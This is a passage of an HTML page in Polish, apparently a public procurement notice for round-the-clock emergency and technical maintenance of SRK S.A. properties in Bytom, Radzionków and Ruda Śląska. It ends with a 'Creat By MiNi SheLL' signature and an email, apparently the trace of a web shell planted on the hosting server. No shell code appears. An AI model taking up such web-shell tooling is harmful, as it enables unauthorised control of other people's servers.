 o wystąpieniu awarii, podjętych czynnościach, zrealizowanych zgłoszeniach lub konieczności podjęcia ewentualnych dalszych działań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III
Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego w nieruchomościach stanowiących 100% własności  SRK S.A. położonych na terenie miasta Bytomia, Radzionkowa i Rudy Śląskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje: zapewnienie działań pogotowia awaryjnego i obsługi technicznej przez całą dobę ( pod telefonem) na następujących zasadach:
1.	Wykonawca winien dysponować numerami telefonii w tym komórkowej oraz adresem mailowym dla potrzeb zgłaszania awarii lub zagrożenia.
2.	Czynności całodobowego pogotowia awaryjnego polegają na przyjęciu zgłoszenia o awarii, ustaleniu przyczyny, zabezpieczeniu skutków awarii, określeniu zakresu rzeczowego niezbędnego do usunięciu awarii, bądź usunięcia zagrożenia
3.	Zgłoszenia o usterkach i awariach Wykonawca przyjmuje całodobowo, w tym w dni wolne od pracy pełniąc dyżur telefoniczny. Zgłoszeń awarii dokonywać mogą pracownicy Zespołu Obsługi Technicznej oraz Punktów Obsługi Klientów Zamawiającego a także mieszkańcy budynków wykazanych w załącznikach 1,2,3. 
4.	W przypadkach wątpliwości co do zasadności zgłoszenia Wykonawca konsultuje zgłoszenie z Działem Technicznym Zamawiającego. 
5.	Obowiązkiem Wykonawcy jest niezwłoczne przystępowanie do prac i zabezpieczanie zgłoszonych awarii (czas reakcji Wykonawcy maksymalnie do  1 godziny od zgłoszenia na dojazd własnym pojazdem do miejsca awarii).
6.	W przypadku konieczności wezwania służb pogotowia technicznego gazowego, ciepłowniczego, elektrycznego itp tj. innych przedsiębiorstw specjalistycznych. Wykonawca podejmuje  realizuję wszelkich czynności we własnym zakresie
7.	W przypadkach wymagających powiadamiania służb ratunkowych (Straż Pożarna, Pogotowie Ratunkowe, Policja) Wykonawca zobowiązany jest do współpracy z odpowiednimi służbami jeżeli zachodzi taka konieczność, w tym zabezpieczanie miejsca w trakcie akcji i po jej zakończeniu (Zamawiający upoważnia Wykonawcę do podpisywania protokołów przejęcia miejsca objętego akcją ratowniczą). 
8.	Wykonawca dokonuje wszelkich zgłoszeń i uzgodnień z dostawcami mediów, stosownymi urzędami lub  instytucjami niezbędnymi dla przeprowadzania prac w celu usunięciu awarii bądź usunięcia zagrożenia
9.	Pracownicy Wykonawcy świadczący czynności całodobowego pogotowia awaryjnego, podczas usuwania awarii lub zagrożenia powinny posiadać przy sobie wydany przez Zamawiającego dokument upoważniający do wstępu do budynków i lokali zarządzanych i administrowanych przez Zamawiającego.
10.	Wykonawca zabezpiecza dla realizacji usługi środki ochrony osobistej,  odzież roboczą przyrządy kontrolno-pomiarowe, narzędzia  w zakresie niezbędnym dla wykonania przedmiotu umowy.
11.	Prace związane z wykonywaniem usługi winny być wykonywane zgodnie z przepisami i zasadami BHP, przepisami przeciwpożarowymi, sztuką budowlaną i technologią zawartą w Polskich Normach dotyczących budownictwa mieszkaniowego, Zamawiający zastrzega sobie prawo do wglądu w dokumenty dotyczące używanych materiałów, 
w szczególności w atesty potwierdzające dopuszczenie do obrotu. 
12.	Wykonawca ponosi pełną odpowiedzialność odszkodowawczą za straty spowodowane przez jego pracowników wskutek niewłaściwego wykonania czynności przy usuwaniu awarii .
13.	Wykonawca zobowiązany jest do wykonywania czynności usunięcia awarii, bądź usunięcia zagrożenia przy pomocy pracowników o kwalifikacjach i doświadczeniu zawodowym umożliwiającym jego wykonanie zgodnie z wymogami ujętymi w obowiązujących przepisach. 
14.	Do obowiązku Wykonawcy należy sporządzanie comiesięcznego zestawienia ilości 
i rodzaju usuniętych awarii z podziałem na nieruchomości i branże prowadzenie rejestru zgłoszeń awarii wpisywanie: daty, godziny, adresu miejsca awarii, danych personalnych dyspozytora oraz osoby zgłaszającej awarię. 
15.	Wykonawca informuje codziennie - na bieżąco koordynatorów Zamawiającego 
 o wystąpieniu awarii, podjętych czynnościach, zrealizowanych zgłoszeniach lub konieczności podjęcia ewentualnych dalszych działań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com